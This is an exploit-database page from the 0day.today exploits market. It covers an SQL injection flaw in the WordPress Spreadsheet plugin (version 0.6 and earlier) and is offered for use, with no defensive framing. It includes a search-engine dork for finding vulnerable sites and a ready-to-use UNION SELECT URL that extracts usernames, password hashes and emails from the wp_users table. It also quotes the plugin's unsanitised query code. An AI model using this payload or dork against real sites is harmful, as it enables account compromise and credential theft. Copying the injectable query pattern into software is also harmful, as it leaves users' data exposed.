[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2911
Category
web applications
Date add
21-04-2008
Platform
unsorted
===============================================================
Wordpress Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability
===============================================================



===========================================
There's standart sql-injection in Spreadsheet <= 0.6 Plugin
# Author : 1ten0.0net1
# Script : Wordpress Plugin Spreadsheet <= 0.6 v.
# BUG :  Remote SQL-Injection Vulnerability
# Dork : inurl:/wp-content/plugins/wpSS/
Example:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
===========================================
Vulnerable code:
ss_load.php
    $id = $_GET['ss_id'];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
    if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
....



#  0day.today [2024-12-25]  #